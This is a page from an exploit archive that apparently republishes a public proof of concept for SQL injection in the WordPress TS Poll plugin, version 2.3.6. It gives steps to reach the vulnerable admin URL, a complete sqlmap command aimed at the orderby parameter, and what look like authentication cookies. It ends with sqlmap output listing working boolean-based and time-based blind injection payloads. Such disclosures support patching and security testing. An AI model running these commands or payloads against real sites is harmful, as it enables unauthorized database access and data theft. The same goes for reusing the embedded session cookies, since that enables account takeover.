Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
# Exploit Title: WordPress Poll Plugin SQL Injection
# Date: 2024-07-06
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-poll/
# Version 2.3.6
1. **Access the Admin Panel:**
- Navigate to the admin panel of your WordPress site.
- Go to `TS Poll > `Create Pool ` > ` Use Theme` and save it. > https://localhost/wordpress/wp-admin/admin.php?page=ts-poll-builder&tsp-id=1
```
2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc
3. Search for orderby parameter.
## SQLMAP COMMAND
python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc" \
--batch \
--dbms=mysql \
--thread=10 \
--no-cast \
--random-agent \
-v 3 \
--tamper="between,randomcase,space2comment" \
--level=5 \
--risk=3 \
-p orderby \
--cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|e111b736b22043864d0f8ea6da823ca00768a110af4da612c555add1979839d1; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|173622110c7f3812695b26c96ba4905a7c760ac41e37645150dd4869ae884c4b; wordpress_test_cookie=WP Cookie check; wp-settings-time-1=1720266472"
## RESULT
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
File Tags
- ActiveX[18] (933)
- Advisory[19] (85,864)
- Arbitrary[20] (16,798)
- BBS[21] (2,859)
- Bypass[22] (1,847)
- CGI[23] (1,033)
- Code Execution[24] (7,744)
- Conference[25] (691)
- Cracker[26] (844)
- CSRF[27] (3,378)
- DoS[28] (24,930)
- Encryption[29] (2,389)
- Exploit[30] (53,023)
- File Inclusion[31] (4,256)
- File Upload[32] (989)
- Firewall[33] (822)
- Info Disclosure[34] (2,874)
- Intrusion Detection[35] (913)
- Java[36] (3,134)
- JavaScript[37] (895)
- Kernel[38] (7,133)
- Local[39] (14,758)
- Magazine[40] (586)
- Overflow[41] (13,133)
- Perl[42] (1,434)
- PHP[43] (5,219)
- Proof of Concept[44] (2,380)
- Protocol[45] (3,720)
- Python[46] (1,628)
- Remote[47] (31,582)
- Root[48] (3,623)
- Rootkit[49] (524)
- Ruby[50] (629)
- Scanner[51] (1,656)
- Security Tool[52] (8,016)
- Shell[53] (3,270)
- Shellcode[54] (1,217)
- Sniffer[55] (901)
- Spoof[56] (2,270)
- SQL Injection[57] (16,579)
- TCP[58] (2,439)
- Trojan[59] (690)
- UDP[60] (901)
- Virus[61] (669)
- Vulnerability[62] (32,869)
- Web[63] (9,935)
- Whitepaper[64] (3,781)
- x86[65] (967)
- XSS[66] (18,230)
- Other[67]
File Archives
- July 2024[68]
- June 2024[69]
- May 2024[70]
- April 2024[71]
- March 2024[72]
- February 2024[73]
- January 2024[74]
- December 2023[75]
- November 2023[76]
- October 2023[77]
- September 2023[78]
- August 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,090)
- BSD[83] (376)
- CentOS[84] (58)
- Cisco[85] (1,927)
- Debian[86] (7,075)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,528)
- HPUX[90] (880)
- iOS[91] (376)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (50,258)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (489)
- RedHat[100] (16,199)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,639)
- UNIX[105] (9,424)
- UnixWare[106] (187)
- Windows[107] (6,665)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]
